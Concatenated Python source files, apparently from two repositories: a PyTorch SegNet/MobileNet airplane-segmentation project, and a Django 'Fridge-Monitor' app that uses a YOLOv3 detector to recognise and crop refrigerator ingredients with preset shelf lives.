seg_img = cv2.resize(seg_img,(orininal_w,orininal_h))
seg_img = np.array(seg_img)
# 原图和效果图叠加
result = cv2.addWeighted(seg_img, 0.3, old_image, 0.7, 0., old_image, cv2.CV_32F)
cv2.imwrite("%s/%s" % (img_save, name) + ".jpg", result)
print("%s.jpg ------>done!!!" % name)
--- FILE SEPARATOR ---
import torch
import numpy as np
from torch.nn import *
from torch.nn import functional as F
from mobilenet_ import Mobilenet
class Segnet(Module):
cfg_filter=[256,128,64,32]
conv_block=[]
BN_block=[]
def __init__(self,num_classes):
super(Segnet, self).__init__()
self.zeropad=ZeroPad2d(padding=1)
self.conv_1=Conv2d(256,256,kernel_size=3,padding=0)
self.conv_2=Conv2d(32,num_classes,kernel_size=3,padding=1)
self.BN_1=BatchNorm2d(256,momentum=0.1)
self.upsample=Upsample(scale_factor=2)
for i in range(len(self.cfg_filter)-1):
self.conv_block += [Conv2d(self.cfg_filter[i],
self.cfg_filter[i + 1],
kernel_size=3,
padding=0)]
self.BN_block +=[BatchNorm2d(self.cfg_filter[i+1])]
self.conv_block=ModuleList(self.conv_block)
self.BN_block = ModuleList(self.BN_block)
def forward(self,o):
#input:52,52,256
o=self.zeropad(o)
o=self.conv_1(o)
o=self.BN_1(o)
#input:104,104,256
for j in range(3):
o=self.upsample(o)
o=self.zeropad(o)
o=self.conv_block[j](o)
o=self.BN_block[j](o)
outputs=self.conv_2(o)
return outputs
#编码器和解码器组合
class Airplanesnet(Module):
def __init__(self,classes1,BATCH_SIZE):
super(Airplanesnet, self).__init__()
self.encoder_part=Mobilenet() #Mobilenet()是从另一个py文件import过来的类
self.decoder_part=Segnet(classes1)
self.classes=classes1
self.batch_size=BATCH_SIZE
def forward(self,input_1):
x=self.encoder_part(input_1)
# x=x[2]
x=self.decoder_part(x)
# x=x.view(self.batch_size,2,43264)
# x=F.softmax(x,dim=1)
return x
#测试decoder网络
if __name__ =="__main__":
model=Airplanesnet(classes1=2,BATCH_SIZE=1)
inputs_1=torch.Tensor(torch.randn(1,3,416,416))
outputs_1=model(inputs_1)
# outputs=outputs[3]
print("outputs shape:" )
print(outputs_1.shape)
--- FILE SEPARATOR ---
import torch
import cv2
import os
import argparse
import numpy as np
from PIL import Image
from torch.nn import *
from torch.optim import Adam
from torch.utils.data import Dataset,DataLoader
from segnet_ import Airplanesnet
BATCH_SIZE1=1 #训练的batch_size
BATCH_SIZE2=1 #验证的batch_size
NUM_CLASSES=2 #分割的种类数
LR=1e-4 #学习率
EPOCH=20 #迭代次数
parser = argparse.ArgumentParser()
parser.add_argument('--gpu',action='store_true',default=True,help='whether use gpu')
parser.add_argument('--train_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/train.txt', help='about trian')
parser.add_argument('--val_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/val.txt', help='about validation')
opt = parser.parse_args()
print(opt)
txt_1 = opt.train_txt
txt_2 = opt.val_txt
#自定义数据集的类
class AirplanesDataset(Dataset):
def __init__(self,txt_path):
super(AirplanesDataset, self).__init__()
paths=open("%s" % txt_path,"r")
data=[]
for lines in paths:
path=lines.rstrip('\n')
data.append(path)
self.data=data
self.len=len(data)
def __getitem__(self, index):
image=cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg_right/%s" %self.data[index]+".jpg",-1)
label = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png_right/%s"%self.data[index] +".png" , -1)
image = cv2.resize(image, dsize=(416, 416))
label = cv2.resize(label, dsize=(416, 416))
image=torch.from_numpy(image)
label=torch.from_numpy(label)
image = image / 255.0 #归一化
label[label>=0.5]=1 #label被resize后像素值会改变,调整像素值为原来的两类
label[label < 0.5] = 0
image=image.permute(2,0,1) #调整图像维度,方便载入model
return image,label
def __len__(self):
return self.len
train_dataset = AirplanesDataset(txt_1) # 训练集
# 加载训练数据集,并且分好mini-batch
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE1,
shuffle=True)
criterion = CrossEntropyLoss() # Loss
model=Airplanesnet(NUM_CLASSES,BATCH_SIZE1)
optimizer = Adam(model.parameters(), # 优化器
lr=LR)
device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu") #检测是否有GPU加速
model.to(device) #网络放入GPU里加速
model.load_state_dict(torch.load('D:/untitled/.idea/SS_torch/weights/SS_weight_2.pth'))
#train函数
def train(epoch):
running_loss=0.0
for batch_idx,data in enumerate(train_loader,0): #0是表示从0开始
image,label=data
# label = torch.squeeze(label)
# lll=label.numpy()
# print(lll.shape)
# f = open('D:/untitled/.idea/SS_torch/dataset/111.txt', 'w')
#
# for x in range(lll.shape[0]):
# f.write('\n')
# for y in range(lll.shape[1]):
#
# f.write(str(lll[x, y,]))
# # label=label.view(BATCH_SIZE1,416,416)
# label = torch.unsqueeze(label, dim=0)
image,label=image.to(device),label.to(device) #数据放进GPU里
optimizer.zero_grad() #优化器参数清零
#forword+backward+update
image=image.type(torch.FloatTensor) #转化数据类型,不转则会报错
image=image.to(device)
outputs=model(image)
loss=criterion(outputs,label.long()) #进行loss计算
lll=label.long().cpu().numpy() #把label从GPU放进CPU
loss.backward(retain_graph=True) #反向传播(求导)
optimizer.step() #优化器更新model权重
running_loss+=loss.item() #收集loss的值
if batch_idx % 100 ==99:
print('[epoch: %d,idex: %2d] loss:%.3f' % (epoch+1,batch_idx+1,running_loss/322))
runing_loss=0.0 #收集的loss值清零
torch.save(model.state_dict(),f='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth') #保存权重
for epoch in range(EPOCH): #迭代次数
train(epoch)
--- FILE SEPARATOR ---
from segnet_ import Airplanesnet
import numpy as np
import torch
import argparse
import copy
import cv2
NCLASSES = 2
BATCH_SIZE=1
#文件的加载路径
parser = argparse.ArgumentParser()
parser.add_argument('--val_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/val.txt', help='about validation')
parser.add_argument('--weights', type=str, default='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth', help='weights')
opt = parser.parse_args()
print(opt)
txt_path = opt.val_txt
weight=opt.weights
__all__ = ['SegmentationMetric']
class SegmentationMetric(object): #计算mIoU、accuracy的类
def __init__(self, numClass):
self.numClass = numClass
self.confusionMatrix = np.zeros((self.numClass,) * 2)
def pixelAccuracy(self):
# return all class overall pixel accuracy
# acc = (TP + TN) / (TP + TN + FP + TN)
acc = np.diag(self.confusionMatrix).sum() / self.confusionMatrix.sum()
acc = round(acc,5)
return acc
def classPixelAccuracy(self):
# return each category pixel accuracy(A more accurate way to call it precision)
# acc = (TP) / TP + FP
classAcc = np.diag(self.confusionMatrix) / self.confusionMatrix.sum(axis=1)
return classAcc
def meanPixelAccuracy(self):
classAcc = self.classPixelAccuracy()
meanAcc = np.nanmean(classAcc)
return meanAcc
def meanIntersectionOverUnion(self):
# Intersection = TP Union = TP + FP + FN
# IoU = TP / (TP + FP + FN)
intersection = np.diag(self.confusionMatrix)
union = np.sum(self.confusionMatrix, axis=1) + np.sum(self.confusionMatrix, axis=0) - np.diag(
self.confusionMatrix)
IoU = intersection / union
mIoU = np.nanmean(IoU)
mIoU =round(mIoU,4)
return mIoU
def genConfusionMatrix(self, imgPredict, imgLabel):
# remove classes from unlabeled pixels in gt image and predict
mask = (imgLabel >= 0) & (imgLabel < self.numClass)
label = self.numClass * imgLabel[mask] + imgPredict[mask]
count = np.bincount(label, minlength=self.numClass ** 2)
confusionMatrix = count.reshape(self.numClass, self.numClass)
return confusionMatrix
def Frequency_Weighted_Intersection_over_Union(self):
# FWIOU = [(TP+FN)/(TP+FP+TN+FN)] *[TP / (TP + FP + FN)]
freq = np.sum(self.confusion_matrix, axis=1) / np.sum(self.confusion_matrix)
iu = np.diag(self.confusion_matrix) / (
np.sum(self.confusion_matrix, axis=1) + np.sum(self.confusion_matrix, axis=0) -
np.diag(self.confusion_matrix))
FWIoU = (freq[freq > 0] * iu[freq > 0]).sum()
return FWIoU
def addBatch(self, imgPredict, imgLabel):
assert imgPredict.shape == imgLabel.shape
self.confusionMatrix += self.genConfusionMatrix(imgPredict, imgLabel)
def reset(self):
self.confusionMatrix = np.zeros((self.numClass, self.numClass))
#读取val.txt中的图片的名称
paths = open("%s" % txt_path, "r")
data = []
for lines in paths:
path = lines.rstrip('\n')
data.append(path)
device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu") #检测是否有GPU加速
model=Airplanesnet(NCLASSES,BATCH_SIZE) #初始化model
model.load_state_dict(torch.load(opt.weights)) #加载权重
model.to(device)
sum_1 = 0 # 累加每张图片val的accuracy
sum_2 = 0 # 累积每张图片Val的mIoU
for i in range(len(data)):
image = cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg_right/%s" % data[i] + ".jpg", -1)
label = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png_right/%s" % data[i] + ".png", -1)
orininal_h = image.shape[0] # 读取的图像的高
orininal_w = image.shape[1] # 读取的图像的宽
image = cv2.resize(image, dsize=(416, 416))
label = cv2.resize(label, dsize=(416, 416))
label[label >= 0.5] = 1 #label被resize后像素值会改变,调整像素值为原来的两类
label[label < 0.5] = 0
image = image / 255.0 # 图像归一化
image = torch.from_numpy(image)
image = image.permute(2, 0, 1) # 显式的调转维度
image = torch.unsqueeze(image, dim=0) # 改变维度,使得符合model input size
image = image.type(torch.FloatTensor) # 数据转换,否则报错
image = image.to(device) # 放入GPU中计算
predict = model(image).cpu()
predict = torch.squeeze(predict) # [1,1,416,416]---->[1,416,416]
predict = predict.permute(1, 2, 0)
predict = predict.detach().numpy()
prc = predict.argmax(axis=-1)
#进行mIoU和accuracy的评测
imgPredict =prc
imgLabel = label
metric = SegmentationMetric(2)
metric.addBatch(imgPredict, imgLabel)
acc = metric.pixelAccuracy()
sum_1+=acc
mIoU = metric.meanIntersectionOverUnion()
sum_2+=mIoU
print("%s.jpg :" % data[i])
print("accuracy: "+str(acc*100)+" %")
print("mIoU: " +str(mIoU))
print("-------------------")
# 全部图片平均的accuracy和mIoU
sum_1=sum_1/len(data)
sum_2=sum_2/len(data)
sum_1 = round(sum_1,5)
sum_2 = round(sum_2,4)
print("M accuracy: "+str(sum_1*100)+" %")
print("M mIoU: " +str(sum_2))
|
[
"/data more.py",
"/maketxt.py",
"/mobilenet_.py",
"/predict_.py",
"/segnet_.py",
"/training.py",
"/validation.py"
] |
01090841589/Fridge-Monitor
|
import os
import sys
import csv
import argparse
from keras_yolo3.yolo import YOLO, detect_video
from PIL import Image
from timeit import default_timer as timer
from Utils.utils import load_extractor_model, load_features, parse_input, detect_object
import test
from Utils import utils
import pandas as pd
import numpy as np
from Utils.Get_File_Paths import GetFileList
import random
src_path = os.path.dirname(os.path.abspath(__file__))
utils_path = os.path.join(src_path, "Utils")
sys.path.append(src_path)
sys.path.append(utils_path)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3" #Tensorflow 경고 안보이게
data_folder = os.path.join(src_path, "Data")
image_test_folder = os.path.join(data_folder, "Test_Images")
detection_results_folder = os.path.join(data_folder, "Results")
detection_results_file = os.path.join(detection_results_folder, "Detection_Results.csv")
model_folder = os.path.join(data_folder, "Model_Weights")
model_weights = os.path.join(model_folder, "trained_weights_final.h5")
model_classes = os.path.join(model_folder, "data_classes.txt")
anchors_path = os.path.join(src_path, "keras_yolo3", "model_data", "yolo_anchors.txt")
if __name__ == "__main__":
input_paths = GetFileList(image_test_folder)
img_endings = (".jpg", ".jpg", ".png")
vid_endings = (".mp4", ".mpeg", ".mpg", ".avi")
input_image_paths = []
input_video_paths = []
for item in input_paths:
if item.endswith(img_endings):
input_image_paths.append(item)
elif item.endswith(vid_endings):
input_video_paths.append(item)
output_path = detection_results_folder
if not os.path.exists(output_path):
os.makedirs(output_path)
yolo = YOLO(
**{
"model_path": model_weights,
"anchors_path": anchors_path,
"classes_path": model_classes,
"score": 0.1, #예측의 점수 기준
"gpu_num": 1,
"model_image_size": (416, 416),
}
)
out_df = pd.DataFrame(
columns=[
"image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
]
)
class_file = open(model_classes, "r")
input_labels = [line.rstrip("\n") for line in class_file.readlines()]
print("Found {} input labels: {} ...".format(len(input_labels), input_labels))
if input_image_paths:
print(
"Found {} input images: {} ...".format(
len(input_image_paths),
[os.path.basename(f) for f in input_image_paths[:5]],
)
)
start = timer()
text_out = ""
# This is for images
for i, img_path in enumerate(input_image_paths):
print(img_path)
prediction, image = detect_object(
yolo,
img_path,
save_img=True,
save_img_path=detection_results_folder,
postfix='_detect',
)
y_size, x_size, _ = np.array(image).shape
for single_prediction in prediction:
out_df = out_df.append(
pd.DataFrame(
[
[
os.path.basename(img_path.rstrip("\n")),
img_path.rstrip("\n"),
]
+ single_prediction
+ [x_size, y_size]
],
columns=[
"image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
],
)
)
end = timer()
print(
"Processed {} images in {:.1f}sec - {:.1f}FPS".format(
len(input_image_paths),
end - start,
len(input_image_paths) / (end - start),
)
)
out_df.to_csv(detection_results_file, index=False)
yolo.close_session()
data_folder = os.path.join(src_path, 'Data\\Results\\Detection_Results.csv')
label_path = os.path.join(src_path, 'Data\\Model_Weights\\data_classes.txt')
class_file = open(label_path, "r")
input_labels = [line.rstrip("\n") for line in class_file.readlines()]
rownum = 0
for file in os.scandir(src_path+'\\crop_img'):
os.remove(file.path)
dec_img = dict()
with open(data_folder, newline='') as csvfile:
reader = csv.reader(csvfile)
for r in reader:
if rownum == 0:
header = r
rownum += 1
continue
img = Image.open(r[1])
print(rownum, float(r[7]))
if not dec_img.get(input_labels[int(r[6])]):
dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
else:
if dec_img[input_labels[int(r[6])]][0] < r[7]:
dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
rownum += 1
for key, value in dec_img.items():
print(key, value)
img = Image.open(value[1])
area = (value[2], value[3], value[4], value[5])
cropped_img = img.crop(area)
cropped_img = cropped_img.convert("RGB")
cropped_img.save('.\\crop_img\\'+key+'.jpg')
--- FILE SEPARATOR ---
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#@title MIT License
#
# Copyright (c) 2017 François Chollet # IGNORE_COPYRIGHT: cleared by OSS licensing
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow_datasets as tfds
tfds.disable_progress_bar()
(raw_train, raw_validation, raw_test), metadata = tfds.load(
'horses_or_humans',
split=['train[:80%]', 'train[80%:90%]', 'train[90%:]'],
with_info=True,
as_supervised=True,
)
print(raw_train)
print(raw_validation)
print(raw_test)
get_label_name = metadata.features['label'].int2str
# for image, label in raw_train.take(2):
# plt.figure()
# plt.imshow(image)
# plt.title(get_label_name(label))
IMG_SIZE = 160 # All images will be resized to 160x160
def format_example(image, label):
image = tf.cast(image, tf.float32)
image = (image/127.5) - 1
image = tf.image.resize(image, (IMG_SIZE, IMG_SIZE))
return image, label
train = raw_train.map(format_example)
validation = raw_validation.map(format_example)
test = raw_test.map(format_example)
BATCH_SIZE = 32
SHUFFLE_BUFFER_SIZE = 1000
train_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)
validation_batches = validation.batch(BATCH_SIZE)
test_batches = test.batch(BATCH_SIZE)
for image_batch, label_batch in train_batches.take(1):
pass
image_batch.shape
IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)
# Create the base model from the pre-trained model MobileNet V2
base_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,
include_top=False,
weights='imagenet')
feature_batch = base_model(image_batch)
print(feature_batch.shape)
base_model.trainable = False
# Let's take a look at the base model architecture
base_model.summary()
global_average_layer = tf.keras.layers.GlobalAveragePooling2D()
feature_batch_average = global_average_layer(feature_batch)
print(feature_batch_average.shape)
prediction_layer = tf.keras.layers.Dense(1)
prediction_batch = prediction_layer(feature_batch_average)
print(prediction_batch.shape)
model = tf.keras.Sequential([
base_model,
global_average_layer,
prediction_layer
])
base_learning_rate = 0.0001
model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=base_learning_rate),
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=['accuracy'])
model.summary()
len(model.trainable_variables)
initial_epochs = 1
validation_steps=20
loss0,accuracy0 = model.evaluate(validation_batches, steps = validation_steps)
print("initial loss: {:.2f}".format(loss0))
print("initial accuracy: {:.2f}".format(accuracy0))
history = model.fit(train_batches,
epochs=initial_epochs,
validation_data=validation_batches)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
# plt.figure(figsize=(8, 8))
# plt.subplot(2, 1, 1)
# plt.plot(acc, label='Training Accuracy')
# plt.plot(val_acc, label='Validation Accuracy')
# plt.legend(loc='lower right')
# plt.ylabel('Accuracy')
# plt.ylim([min(plt.ylim()),1])
# plt.title('Training and Validation Accuracy')
# plt.subplot(2, 1, 2)
# plt.plot(loss, label='Training Loss')
# plt.plot(val_loss, label='Validation Loss')
# plt.legend(loc='upper right')
# plt.ylabel('Cross Entropy')
# plt.ylim([0,1.0])
# plt.title('Training and Validation Loss')
# plt.xlabel('epoch')
# plt.show()
base_model.trainable = True
# Let's take a look to see how many layers are in the base model
print("Number of layers in the base model: ", len(base_model.layers))
# Fine-tune from this layer onwards
fine_tune_at = 100
# Freeze all the layers before the `fine_tune_at` layer
for layer in base_model.layers[:fine_tune_at]:
layer.trainable = False
model.compile(loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
optimizer = tf.keras.optimizers.RMSprop(lr=base_learning_rate/10),
metrics=['accuracy'])
model.summary()
print(len(model.trainable_variables))
fine_tune_epochs = 1
total_epochs = initial_epochs + fine_tune_epochs
history_fine = model.fit(train_batches,
epochs=total_epochs,
initial_epoch = history.epoch[-1],
validation_data=validation_batches)
acc += history_fine.history['accuracy']
val_acc += history_fine.history['val_accuracy']
loss += history_fine.history['loss']
val_loss += history_fine.history['val_loss']
--- FILE SEPARATOR ---
import tensorflow as tf
# Show pictures
import os, random
import matplotlib.pyplot as plt
import numpy as np
from keras.preprocessing import image
def show_pictures(path):
random_img = random.choice(os.listdir(path))
img_path = os.path.join(path, random_img)
img = image.load_img(img_path, target_size=(img_width, img_height))
img_tensor = image.img_to_array(img) # Image data encoded as integers in the 0–255 range
img_tensor /= 255. # Normalize to [0,1] for plt.imshow application
plt.imshow(img_tensor)
plt.show()
for i in range(0,2):
show_pictures(train_cats_dir)
show_pictures(train_dogs_dir)
# Base variables
base_dir = '/Users/macbook/book/dogs_cats/data'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
train_size, validation_size, test_size = 200, 100, 100
img_width, img_height = 224, 224 # Default input size for VGG16
--- FILE SEPARATOR ---
from django.contrib import admin
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework.permissions import AllowAny
from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework_jwt.views import refresh_jwt_token
from rest_framework_jwt.views import verify_jwt_token
schema_view = get_schema_view(
openapi.Info(
# 필수 인자
title="figeMonitor API",
default_version="v1",
# 선택 인자
description="API 서비스입니다.",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="ihs3583@gmail.com"),
license=openapi.License(name="SSAFY License"),
),
public=True,
permission_classes=( AllowAny,),
)
urlpatterns = [
path('api-token-auth/', obtain_jwt_token),
path('api-token-refresh/', refresh_jwt_token),
path('api-token-verify/', verify_jwt_token),
path('admin/', admin.site.urls),
path('userapi/', include('userApi.urls')),
path('swagger/', schema_view.with_ui('swagger'), name='schema-swagger-ui'),
]
--- FILE SEPARATOR ---
import os
import sys
import csv
import argparse
from media.AI.keras_yolo3.yolo import YOLO, detect_video
from PIL import Image
from timeit import default_timer as timer
from media.AI.Utils.utils import load_extractor_model, load_features, parse_input, detect_object
import test
from media.AI.Utils import utils
import pandas as pd
import numpy as np
from media.AI.Utils.Get_File_Paths import GetFileList
from keras import backend
import random
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
infos = {'onion': {'name': '양파',
'expirationDate': 7,
'kind': '야채',
'note': '',},
'carrot':{'name': '당근',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'potato':{'name': '감자',
'expirationDate': 5,
'kind': '야채',
'note': '',},
'greenOnion':{'name': '대파',
'expirationDate': 10,
'kind': '야채',
'note': '',},
'garlic':{'name': '마늘',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'garlicPart':{'name': '마늘',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'tomato_top':{'name': '토마토',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'tomato_side':{'name': '토마토',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'green-chili':{'name': '풋고추',
'expirationDate': 10,
'kind': '야채',
'note': '',},
'egg_white':{'name': '계란',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'egg_brown':{'name': '계란',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'parprika':{'name': '파프리카',
'expirationDate': 21,
'kind': '야채',
'note': '',},
'parprika_top':{'name': '파프리카',
'expirationDate': 21,
'kind': '야채',
'note': '',},
'enoki-mushroom':{'name': '팽이버섯',
'expirationDate': 5,
'kind': '야채',
'note': '',},
'king_oyster_mushroom':{'name': '느타리버섯',
'expirationDate': 5,
'kind': '야채',
'note': '',},
'agaricus_bisporus':{'name': '새송이버섯',
'expirationDate': 14,
'kind': '야채',
'note': '',},
'meat':{'name': '고기',
'expirationDate': 3,
'kind': '육류',
'note': '',},
'corn':{'name': '옥수수',
'expirationDate': 3,
'kind': '육류',
'note': '',},
'broccoli':{'name': '브로콜리',
'expirationDate': 7,
'kind': '육류',
'note': '',},
'raw-chicken':{'name': '닭고기',
'expirationDate': 2,
'kind': '육류',
'note': '',},
}
src_path = os.path.dirname(os.path.abspath(__file__))
utils_path = os.path.join(src_path, "Utils")
sys.path.append(src_path)
sys.path.append(utils_path)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3" #Tensorflow 경고 안보이게
data_folder = os.path.join(src_path, "Data")
image_test_folder = os.path.join(data_folder, "Test_Images")
detection_results_folder = os.path.join(data_folder, "Results")
detection_results_file = os.path.join(detection_results_folder, "Detection_Results.csv")
model_folder = os.path.join(data_folder, "Model_Weights")
model_weights = os.path.join(model_folder, "trained_weights_final.h5")
model_classes = os.path.join(model_folder, "data_classes.txt")
anchors_path = os.path.join(src_path, "keras_yolo3", "model_data", "yolo_anchors.txt")
def detector(input_image, username):
file = input_image["file"]
if not os.path.exists(image_test_folder):
os.makedirs(image_test_folder)
path = default_storage.save(image_test_folder+'\\buf_img.jpg', ContentFile(file.read()))
input_paths = GetFileList(image_test_folder)
img_endings = (".jpg", ".jpg", ".png")
vid_endings = (".mp4", ".mpeg", ".mpg", ".avi")
input_img = Image.open(input_paths[0])
input_image_paths = [input_paths[0]]
output_path = detection_results_folder
if not os.path.exists(output_path):
os.makedirs(output_path)
yolo = YOLO(
**{
"model_path": model_weights,
"anchors_path": anchors_path,
"classes_path": model_classes,
"score": 0.1, #예측의 점수 기준
"gpu_num": 1,
"model_image_size": (416, 416),
}
)
out_df = pd.DataFrame(
columns=[
"image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
]
)
class_file = open(model_classes, "r")
input_labels = [line.rstrip("\n") for line in class_file.readlines()]
print("Found {} input labels: {} ...".format(len(input_labels), input_labels))
if input_image_paths:
print(
"Found {} input images: {} ...".format(
len(input_image_paths),
[os.path.basename(f) for f in input_image_paths[:5]],
)
)
start = timer()
text_out = ""
# This is for images
prediction, image = detect_object(
yolo,
input_paths[0],
save_img=False,
save_img_path=detection_results_folder,
postfix='_detect',
)
y_size, x_size, _ = np.array(image).shape
for single_prediction in prediction:
out_df = out_df.append(
pd.DataFrame(
[
[
os.path.basename(input_paths[0].rstrip("\n")),
input_paths[0].rstrip("\n"),
]
+ single_prediction
+ [x_size, y_size]
],
columns=[
"image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
],
)
)
end = timer()
print(
"Processed {} images in {:.1f}sec - {:.1f}FPS".format(
len(input_image_paths),
end - start,
len(input_image_paths) / (end - start),
)
)
out_df.to_csv(detection_results_file, index=False)
# yolo.close_session()
backend.clear_session()
data_folder = os.path.join(src_path, 'Data/Results/Detection_Results.csv')
label_path = os.path.join(src_path, 'Data/Model_Weights/data_classes.txt')
class_file = open(label_path, "r")
input_labels = [line.rstrip("\n") for line in class_file.readlines()]
rownum = 0
# for file in os.scandir(src_path+'\\crop_img'):
# os.remove(file.path)
dec_img = dict()
with open(data_folder, newline='') as csvfile:
reader = csv.reader(csvfile)
for r in reader:
if rownum == 0:
header = r
rownum += 1
continue
img = Image.open(r[1])
if not dec_img.get(input_labels[int(r[6])]):
dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
else:
if dec_img[input_labels[int(r[6])]][0] < r[7]:
dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
rownum += 1
result = []
for key, value in dec_img.items():
img = Image.open(value[1])
area = (value[2], value[3], value[4], value[5])
cropped_img = img.crop(area)
cropped_img = cropped_img.convert("RGB")
if not os.path.exists('./media/AI/crop_img/'+username+'/'):
os.makedirs('./media/AI/crop_img/'+username+'/')
nam = infos.get(key).get('name')
cropped_img.save('./media/AI/crop_img/'+username+'/'+nam+'.jpg')
result.append(infos[key])
return result
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import *
from django.contrib.auth.models import User
# @admin.register(User)
# class userAdmin(admin.ModelAdmin):
# list_display = ['id','username','email']
@admin.register(ingredients)
class foodAdmin(admin.ModelAdmin):
list_display = ['user','name','section','floor','created_at', 'expire_date', 'image', 'classification', 'content', ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 06:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userApi', '0002_contents'),
]
operations = [
migrations.AlterField(
model_name='contents',
name='content',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='contents',
name='created_at',
field=models.DateField(auto_now_add=True),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 06:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userApi', '0003_auto_20200604_1532'),
]
operations = [
migrations.AlterField(
model_name='contents',
name='expire_date',
field=models.CharField(max_length=10),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 10:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userApi', '0004_auto_20200604_1540'),
]
operations = [
migrations.AddField(
model_name='contents',
name='floor',
field=models.IntegerField(default=1),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
class inputFile(models.Model):
image = models.ImageField(blank=False, null=False,)
class refrigeSection(models.Model):
name = models.CharField(max_length=20)
user = models.ForeignKey(User, on_delete=models.CASCADE)
class ingredients(models.Model):
name = models.CharField(max_length=30)
image = models.ImageField(blank=True)
section = models.CharField(blank=True, max_length=20)
floor = models.IntegerField(default = 0)
created_at = models.DateField(auto_now_add=True)
expire_date = models.CharField(max_length=10)
classification = models.CharField(max_length=30)
content = models.TextField(null=True, blank=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.name
--- FILE SEPARATOR ---
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import refrigeSection, inputFile, ingredients
class UserCreationSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['id','username','password', 'email']
class UserSerializer(serializers.ModelSerializer):
# 특정 유저가 가지고 있는 todo 목록들(여러개 -> many=True)
# todo_set = TodoSerializer(many=True)
class Meta:
model = User
fields = ['id','email','username']
class PasswordChangeSerializer(serializers.ModelSerializer):
# newPassword = serializers.CharField(required=True)
class Meta:
model = User
fields = ['password',]
class SectionSerializer(serializers.ModelSerializer):
class Meta:
model = refrigeSection
fields = ['name']
